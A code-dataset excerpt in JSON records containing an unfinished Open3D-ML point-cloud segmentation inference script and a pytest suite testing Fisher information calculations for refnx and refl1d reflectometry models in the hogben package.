"usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 330, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 331, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 333, "usage_type": "call"}, {"api_name": "pyamd.prepinputs.Prepper", "line_number": 341, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 346, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 356, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 357, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 358, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 359, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 360, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 361, "usage_type": "call"}, {"api_name": "pyamd.summarize.Summary", "line_number": 364, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 372, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 381, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 391, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 405, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 413, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 421, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 434, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 444, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 445, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 455, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 456, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 465, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 466, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 476, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 477, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 487, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 495, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 496, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 497, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 498, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 499, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path", "line_number": 504, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path", "line_number": 505, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 505, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 523, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 563, "usage_type": "call"}, {"api_name": "os.path", "line_number": 563, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 564, "usage_type": "call"}]} +{"seq_id": "447911137", "text": "import argparse\nimport copy\nimport os\nimport os.path as osp\nimport pprint\nimport sys\nimport time\nfrom pathlib import Path\n\nimport numpy as np\nimport yaml\n\n\nclass SemSegPredictor:\n def __init__(self):\n\n self.home_path = str(Path.home())\n self.base_path = self.home_path + \"/dev/Open3D-ML\"\n self.dateset_path = self.home_path + \"/datasets/SmartLab\"\n self.ckpt_path = self.base_path + \"/mytests/logs/RandLANet_SmartLab_tf/checkpoint/ckpt-6\"\n self.randlanet_smartlab_cfg = self.base_path + \"/ml3d/configs/randlanet_smartlab.yml\"\n self.kpconv_smartlab_cfg = self.base_path + \"/ml3d/configs/kpconv_smartlab.yml\"\n\n os.environ[\"OPEN3D_ML_ROOT\"] = base_path\n import open3d.ml as _ml3d\n\n self._ml3d = _ml3d\n\n kwargs = {\n \"framework\": \"tf\",\n \"device\": \"cuda\",\n \"dataset_path\": datesetbase,\n \"split\": \"test\",\n \"ckpt_path\": ckpt_path,\n \"cfg_file\": randlanet_smartlab_cfg,\n }\n\n self.args = type(\"args\", (object,), kwargs)()\n\n pprint.pprint(kwargs)\n\n if args.framework == \"torch\":\n import open3d.ml.torch as ml3d\n\n self.ml3d = ml3d\n else:\n import open3d.ml.tf as ml3d\n import tensorflow as tf\n\n self.ml3d = ml3d\n self.tf = tf\n\n def config_gpu(self):\n gpus = tf.config.experimental.list_physical_devices(\"GPU\")\n print(gpus)\n\n if gpus:\n try:\n for gpu in gpus:\n self.tf.config.experimental.set_memory_growth(gpu, True)\n if self.args.device == \"cpu\":\n self.tf.config.set_visible_devices([], \"GPU\")\n elif self.args.device == \"cuda\":\n self.tf.config.set_visible_devices(gpus[0], \"GPU\")\n else:\n idx = self.args.device.split(\":\")[1]\n self.tf.config.set_visible_devices(gpus[int(idx)], \"GPU\")\n except RuntimeError as e:\n print(e)\n\n @staticmethod\n def merge_cfg_file(cfg, args):\n if args.device is not None:\n cfg.pipeline.device = args.device\n cfg.model.device = args.device\n if args.split is not None:\n cfg.pipeline.split = args.split\n if args.dataset_path is not None:\n cfg.dataset.dataset_path = args.dataset_path\n if args.ckpt_path is not None:\n cfg.model.ckpt_path = args.ckpt_path\n\n return cfg.dataset, cfg.pipeline, cfg.model\n\n def setup_lut_colors(self):\n Unlabeled = [231, 87, 36]\n Floor = [188, 169, 26]\n Wall = [100, 244, 245]\n Robot = [150, 30, 140]\n Human = [0, 248, 26]\n AGV = [18, 35, 243]\n\n colors = {\n \"Unlabeled\": [x / 255.0 for x in Unlabeled],\n \"Floor\": [x / 255.0 for x in Floor],\n \"Wall\": [x / 255.0 for x in Wall],\n \"Robot\": [x / 255.0 for x in Robot],\n \"Human\": [x / 255.0 for x in Human],\n \"AGV\": [x / 255.0 for x in AGV],\n }\n\n self.colors = colors\n\n def config_pipeline(self):\n\n cfg = self._ml3d.utils.Config.load_from_file(self.args.cfg_file)\n\n Pipeline = self._ml3d.utils.get_module(\"pipeline\", cfg.pipeline.name, self.args.framework)\n Model = self._ml3d.utils.get_module(\"model\", cfg.model.name, self.args.framework)\n Dataset = self._ml3d.utils.get_module(\"dataset\", cfg.dataset.name)\n\n cfg_dataset, cfg_pipeline, cfg_model = merge_cfg_file(cfg, self.args)\n\n self.dataset = Dataset(**cfg_dataset)\n self.model = Model(**cfg_model)\n self.pipeline = Pipeline(model, dataset, **cfg_pipeline)\n\n self.pipeline.cfg_tb = {\n \"readme\": \"readme\",\n \"cmd_line\": \"cmd_line\",\n \"dataset\": pprint.pformat(cfg_dataset, indent=2),\n \"model\": pprint.pformat(cfg_model, indent=2),\n \"pipeline\": pprint.pformat(cfg_pipeline, indent=2),\n }\n\n def run_pipeline_inference(dataframe):\n print(dataframe.name)\n results = self.pipeline.run_inference(dataframe.data)\n pred = (results[\"predict_labels\"]).astype(np.int32)\n return pred\n\n def run_pipeline_traintest():\n if self.args.split == \"test\":\n self.pipeline.run_test()\n else:\n self.pipeline.run_train()\n\n def run_pipeline_test():\n self.pipeline.load_ckpt(ckpt_path=self.args.ckpt_path)\n test_split = self.dataset.get_split(\"test\")\n\n vis_points = []\n times = []\n acc = []\n\n for idx in range(len(test_split)):\n # for idx in range(5):\n\n st = time.perf_counter()\n attr = test_split.get_attr(idx)\n data = test_split.get_data(idx)\n\n print(attr)\n results = self.pipeline.run_inference(data)\n\n pred = (results[\"predict_labels\"]).astype(np.int32)\n # scores = results['predict_scores']\n\n label = data[\"label\"]\n pts = data[\"point\"]\n\n vis_d = {\n \"name\": attr[\"name\"],\n \"points\": pts,\n \"labels\": label,\n \"pred\": pred,\n }\n\n vis_points.append(vis_d)\n et = time.perf_counter()\n times.append(et - st)\n\n correct = (pred == label).sum()\n print(f\"Correct: \" + str(correct) + \" out of \" + str(len(label)))\n accuracy = correct / len(label)\n acc.append(accuracy)\n print(f\"Accuracy: \" + str(accuracy))\n\n print(\"\\n\")\n print(times)\n print(f\"Average time {np.mean(times):0.4f} seconds\")\n overall_acc = np.asarray(acc).sum() / len(acc)\n print(\"Overall Accuracy: \" + str(overall_acc))\n\n v = self.ml3d.vis.Visualizer()\n lut = self.ml3d.vis.LabelLUT()\n\n label_names = self.dataset.get_label_to_names()\n pprint.pprint(label_names)\n\n for (c, cv), (l, lv) in zip(colors.items(), label_names.items()):\n lut.add_label(lv, l, cv)\n\n v.set_lut(\"labels\", lut)\n v.set_lut(\"pred\", lut)\n\n v.visualize(vis_points, width=2600, height=2000)\n\n\ndef main(args):\n ps = pointcloud_segmenter()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "sub_path": "mytests/ml-pipeline-inference.py", "file_name": "ml-pipeline-inference.py", "file_ext": "py", "file_size_in_byte": 6326, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path.home", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "open3d.ml", "line_number": 27, "usage_type": "name"}, {"api_name": "pprint.pprint", "line_number": 40, "usage_type": "call"}, {"api_name": "open3d.ml.torch", "line_number": 45, "usage_type": "name"}, {"api_name": "open3d.ml.tf", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.config.experimental.list_physical_devices", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 121, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 122, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 129, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 156, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 182, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 189, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 205, "usage_type": "attribute"}]} +{"seq_id": "654418457", "text": "import copy\n\nimport bumps.parameter\nimport numpy as np\nimport pytest\nimport refnx\nimport refl1d.experiment\n\nfrom hogben.simulate import simulate\nfrom hogben.utils import fisher\nfrom refnx.reflect import SLD as SLD_refnx\nfrom refl1d.material import SLD as SLD_refl1d\nfrom unittest.mock import Mock, patch\n\n\nQS = [np.array([0.1, 0.2, 0.4, 0.6, 0.8])]\nCOUNTS = [np.ones(len(QS[0])) * 100]\n\n\n@pytest.fixture\ndef refl1d_model():\n \"\"\"Define a bilayer sample, and return the associated refl1d model\"\"\"\n # Define sample\n air = SLD_refl1d(rho=0, name='Air')\n layer1 = SLD_refl1d(rho=4, name='Layer 1')(thickness=60, interface=8)\n layer2 = SLD_refl1d(rho=8, name='Layer 2')(thickness=150, interface=2)\n substrate = SLD_refl1d(rho=2.047, name='Substrate')(thickness=0,\n interface=2)\n layer1.thickness.pm(10)\n layer2.thickness.pm(10)\n layer1.interface.pm(1)\n layer2.interface.pm(1)\n sample = substrate | layer2 | layer1 | air\n\n # Define model\n angle_times = [(0.7, 100, 5), (2.0, 100, 20)] # (Angle, Points, Time)\n model, _ = simulate(sample, angle_times)\n model.xi = [layer1.interface, layer2.interface, layer1.thickness,\n layer2.thickness]\n return model\n\n\n@pytest.fixture\ndef refnx_model():\n \"\"\"Define a bilayer sample, and return the associated refnx model\"\"\"\n # Define sample\n air = SLD_refnx(0, name='Air')\n layer1 = SLD_refnx(4, name='Layer 1')(thick=60, rough=8)\n layer2 = SLD_refnx(8, name='Layer 2')(thick=150, rough=2)\n substrate = SLD_refnx(2.047, name='Substrate')(thick=0, rough=2)\n layer1.thick.bounds = (50, 70)\n layer2.thick.bounds = (140, 160)\n layer1.rough.bounds = (7, 9)\n layer2.rough.bounds = (1, 3)\n sample = air | layer1 | layer2 | substrate\n model = refnx.reflect.ReflectModel(sample, scale=1, bkg=5e-6, dq=2)\n # Define model\n model.xi = [layer1.rough, layer2.rough, layer1.thick, layer2.thick]\n return model\n\n\n@pytest.fixture\ndef mock_refnx_model():\n \"\"\"\n Create a mock of the refl1d model with a given set of parameters and their\n bounds\n \"\"\"\n # Parameters described as tuples: (value, lower bound, upper bound)\n parameter_values = [(20, 15, 25), (50, 45, 55), (10, 7.5, 8.5),\n (2, 1.5, 2.5)]\n\n # Fill parameter values and bounds\n parameters = [\n Mock(spec=refnx.analysis.Parameter, value=value,\n bounds=Mock(lb=lb, ub=ub))\n for value, lb, ub in parameter_values\n ]\n model = Mock(spec=refnx.reflect.ReflectModel, xi=parameters)\n model.xi = parameters\n return model\n\n\n@pytest.fixture\ndef mock_refl1d_model():\n \"\"\"\n Create a mock of the refl1d model with a given set of parameters and their\n bounds\n \"\"\"\n # Parameters described as tuples: (value, lower bound, upper bound)\n parameter_values = [(20, 15, 25), (50, 45, 55), (10, 7.5, 8.5),\n (2, 1.5, 2.5)]\n\n # Fill parameter values and bounds\n parameters = [\n Mock(spec=bumps.parameter.Parameter, value=value,\n bounds=Mock(limits=[lb, ub]))\n for value, lb, ub in parameter_values\n ]\n model = Mock(spec=refl1d.experiment.Experiment, xi=parameters)\n model.xi = parameters\n return model\n\n\ndef generate_reflectivity_data():\n \"\"\"\n Generates predefined reflectivity.The reflectivity values are yielded\n alternatingly between two predefined lists of reflectivity values,\n simulating a change in reflectivity between two data points\n \"\"\"\n r = [[1.0, 0.5, 0.4, 0.2, 0.1], [0.95, 0.45, 0.35, 0.15, 0.05]]\n while True:\n yield r[0]\n yield r[1]\n\n\ndef test_fisher_workflow_refnx(refnx_model):\n \"\"\"\n Runs the entire fisher workflow for the refnx model, and checks that the\n corresponding results are consistent with the expected values\n \"\"\"\n g = fisher(QS, refnx_model.xi, COUNTS, [refnx_model])\n expected_fisher = [\n [5.17704306e-06, 2.24179068e-06, -5.02221954e-07, -7.91886209e-07],\n [2.24179068e-06, 1.00559528e-06, -2.09433754e-07, -3.18583142e-07],\n [-5.02221954e-07, -2.09433754e-07, 5.75647233e-08, 1.03142100e-07],\n [-7.91886209e-07, -3.18583142e-07, 1.03142100e-07, 1.99470835e-07]\n ]\n np.testing.assert_allclose(g, expected_fisher, rtol=1e-08)\n\n\ndef test_fisher_workflow_refl1d(refl1d_model):\n \"\"\"\n Runs the entire fisher workflow for the refl1d model, and checks that the\n corresponding results are consistent with the expected values\n \"\"\"\n g = fisher(QS, refl1d_model.xi, COUNTS, [refl1d_model])\n expected_fisher = [\n [4.58294661e-06, 2.07712766e-06, -4.23068571e-07, -6.80596824e-07],\n [2.07712766e-06, 9.76175381e-07, -1.84017555e-07, -2.83513452e-07],\n [-4.23068571e-07, -1.84017555e-07, 4.51142562e-08, 8.21397190e-08],\n [-6.80596824e-07, -2.83513452e-07, 8.21397190e-08, 1.62625881e-07]\n ]\n np.testing.assert_allclose(g, expected_fisher, rtol=1e-08)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\ndef test_fisher_analytical_values(mock_reflectivity, model_class, request):\n \"\"\"\n Tests that the values of the calculated Fisher information matrix (FIM)\n are calculated correctly when no importance scaling is given.\n\n The FIM is calculated using matrix multiplication given:\n g = J.T x M x J\n\n\n Where J describes the Jacobian of the reflectance with respect to the\n parameter value, and M describe the diagonal matrix of the incident count\n divided by the model reflectances. J.T describes the transpose of J.\n\n For this unit test the values for J and M are known:\n J = [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ]\n\n M is given by by:\n M = [ 100., 0., 0., 0., 0.],\n [ 0., 200., 0., 0., 0.],\n [ 0., 0., 250., 0., 0.],\n [ 0., 0., 0., 500., 0.],\n [ 0., 0., 0., 0., 1000.]\n\n Resulting in g = J.T x M x J:\n g = [128.125, 51.25 , 256.25 ],\n [ 51.25 , 20.5 , 102.5 ],\n [256.25 , 102.5 , 512.5 ]\n\n After this, the elements are scaled to the bounds of each unit. Using:\n g_scaled = H.T * g *H\n Where H is a diagonal matrix where the diagonal elements for each\n parameter are given by H_ij = 1/(upper_bound - lower_bound), resulting in:\n H = [0.1, 0. , 0. ],\n [0. , 0.1, 0. ],\n [0. , 0. , 1. ]\n\n Which should finally result in the FIM matrix equal to:\n g = [1.28125, 0.5125, 25.625],\n [0.5125, 0.205, 10.25],\n [25.625, 10.25, 512.5]\n \"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:3]\n mock_reflectivity.side_effect = generate_reflectivity_data()\n g_correct = [\n [1.28125, 0.5125, 25.625],\n [0.5125, 0.205, 10.25],\n [25.625, 10.25, 512.5]\n ]\n g_reference = fisher(QS, xi, COUNTS, [model])\n np.testing.assert_allclose(g_reference, g_correct, rtol=1e-08)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\ndef test_fisher_importance_scaling(mock_reflectivity, model_class, request):\n \"\"\"\n Tests that the values of the calculated Fisher information matrix\n are calculated correctly when an importance scaling is applied.\n\n The importance scaling is applied by scaling each parameter of the FIM\n to a given importance value using g_scaled = g * importance\n Where g is the unscaled FIM, and importance is a diagonal matrix with\n the importance scaling of each parameter on the diagonals. For this unit\n test the importance matrix is equal to:\n importance = [1, 0 , 0]\n [0, 2, 0]\n [0, 0, 3]\n Yielding a FIM where every column should be scaled by the corresponding\n diagonal in the importance matrix:\n g = [1.28125, 1.025, 76.875],\n [0.5125, 0.41, 30.75],\n [25.625, 20.5, 1537.5]\n \"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:3]\n for index, param in enumerate(xi):\n param.importance = index + 1\n mock_reflectivity.side_effect = generate_reflectivity_data()\n g_correct = [\n [1.28125, 1.025, 76.875],\n [0.5125, 0.41, 30.75],\n [25.625, 20.5, 1537.5]\n ]\n g_reference = fisher(QS, xi, COUNTS, [model])\n np.testing.assert_allclose(g_reference, g_correct, rtol=1e-08)\n\n\n@pytest.mark.parametrize('model_class', (\"refl1d_model\",\n \"refnx_model\"))\n@pytest.mark.parametrize('step', (0.01, 0.0075, 0.0025, 0.001, 0.0001))\ndef test_fisher_consistent_steps(step, model_class, request):\n \"\"\"\n Tests whether the Fisher information remains mostly consistent when\n changing step size using the refnx model\n \"\"\"\n model = request.getfixturevalue(model_class)\n g_reference = fisher(QS, model.xi, COUNTS, [model], step=0.005)\n g_compare = fisher(QS, model.xi, COUNTS, [model], step=step)\n np.testing.assert_allclose(g_reference, g_compare, rtol=1e-02)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@pytest.mark.parametrize('model_params', (1, 2, 3, 4))\ndef test_fisher_shape(mock_reflectivity, model_params, model_class, request):\n \"\"\"\n Tests whether the shape of the Fisher information matrix remains\n correct when changing the amount of parameters\n \"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:model_params]\n\n mock_reflectivity.side_effect = generate_reflectivity_data()\n\n expected_shape = (model_params, model_params)\n g = fisher(QS, xi, COUNTS, [model])\n np.testing.assert_array_equal(g.shape, expected_shape)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@pytest.mark.parametrize('qs',\n (np.arange(0.001, 1.0, 0.25),\n np.arange(0.001, 1.0, 0.10),\n np.arange(0.001, 1.0, 0.05),\n np.arange(0.001, 1.0, 0.01)))\ndef test_fisher_diagonal_non_negative(mock_reflectivity, qs, model_class,\n request):\n \"\"\"Tests whether the diagonal values in the Fisher information matrix\n are all zero or greater\"\"\"\n model = request.getfixturevalue(model_class)\n mock_reflectivity.side_effect = (np.random.rand(len(qs)) for _ in range(9))\n counts = [np.ones(len(qs)) * 100]\n g = fisher([qs], model.xi, counts, [model])\n assert np.all(np.diag(g)) >= 0\n\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@pytest.mark.parametrize('model_params', (1, 2, 3, 4))\ndef test_fisher_no_data(model_params, model_class, request):\n \"\"\"Tests whether a model with zero data points properly returns an empty\n matrix of the correct shape\"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:model_params]\n g = fisher([], xi, COUNTS, [model])\n np.testing.assert_equal(g, np.zeros((len(xi), len(xi))))\n\n\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@patch('hogben.utils.reflectivity')\ndef test_fisher_no_parameters(mock_reflectivity, model_class, request):\n \"\"\"Tests whether a model without any parameters properly returns a\n zero array\"\"\"\n model = request.getfixturevalue(model_class)\n mock_reflectivity.side_effect = generate_reflectivity_data()\n g = fisher(QS, [], COUNTS, [model])\n np.testing.assert_equal(g.shape, (0, 0))\n\n\n@pytest.mark.parametrize('model_class', (\"refnx_model\",\n \"refl1d_model\"))\ndef test_fisher_doubling_with_two_identical_models(model_class, request):\n \"\"\"\n Tests that using two identical models with the same q-points and counts\n correctly doubles the values on the elements in the Fisher information\n matrix\n \"\"\"\n model = request.getfixturevalue(model_class)\n g_single = fisher(QS, model.xi, COUNTS, [model], 0.005)\n\n counts = [COUNTS[0], COUNTS[0]]\n qs = [QS[0], QS[0]]\n g_double = fisher(qs, model.xi, counts, [model, model], 0.005)\n np.testing.assert_allclose(g_double, g_single * 2, rtol=1e-08)\n\n\n@pytest.mark.parametrize('model_class', (\"refnx_model\",\n \"refl1d_model\"))\ndef test_multiple_models_shape(model_class, request):\n \"\"\"\n Tests that shape of the Fisher information matrix is equal to the total\n sum of parameters over all models.\n \"\"\"\n model = request.getfixturevalue(model_class)\n model_2 = copy.deepcopy(model)\n model_2.xi = model_2.xi[:-1]\n xi = model.xi + model_2.xi\n xi_length = len(model.xi) + len(model_2.xi)\n counts = [COUNTS[0], COUNTS[0]]\n qs = [QS[0], QS[0]]\n g_double = fisher(qs, xi, counts, [model, model_2], 0.005)\n np.testing.assert_equal(g_double.shape, (xi_length, xi_length))\n", "sub_path": "hogben/tests/test_fisher.py", "file_name": "test_fisher.py", "file_ext": "py", "file_size_in_byte": 13294, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 17, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 24, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 25, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 26, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 27, "usage_type": "call"}, {"api_name": "hogben.simulate.simulate", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 20, "usage_type": "attribute"}, {"api_name": "refnx.reflect.SLD", "line_number": 47, "usage_type": "call"}, {"api_name": "refnx.reflect.SLD", "line_number": 48, "usage_type": "call"}, {"api_name": "refnx.reflect.SLD", "line_number": 49, "usage_type": "call"}, {"api_name": "refnx.reflect.SLD", "line_number": 50, "usage_type": "call"}, {"api_name": "refnx.reflect.ReflectModel", "line_number": 56, "usage_type": "call"}, {"api_name": "refnx.reflect", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 74, "usage_type": "call"}, {"api_name": "refnx.analysis", "line_number": 74, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 75, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 78, "usage_type": "call"}, {"api_name": "refnx.reflect", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 62, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 95, "usage_type": "call"}, {"api_name": "bumps.parameter.parameter", "line_number": 95, "usage_type": "attribute"}, {"api_name": "bumps.parameter", "line_number": 95, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 96, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 99, "usage_type": "call"}, {"api_name": "refl1d.experiment.experiment", "line_number": 99, "usage_type": "attribute"}, {"api_name": "refl1d.experiment", "line_number": 99, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 83, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 128, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 143, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 203, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 147, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 147, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 239, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 206, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 207, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 207, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 251, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 253, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 242, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 244, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 244, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 272, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 256, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 257, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 259, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 259, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 288, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 289, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 291, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 275, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 276, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 276, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 278, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 278, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 282, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.testing.assert_equal", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 302, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 293, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 295, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 295, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.testing.assert_equal", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 305, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 305, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 307, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 326, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 331, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 317, "usage_type": 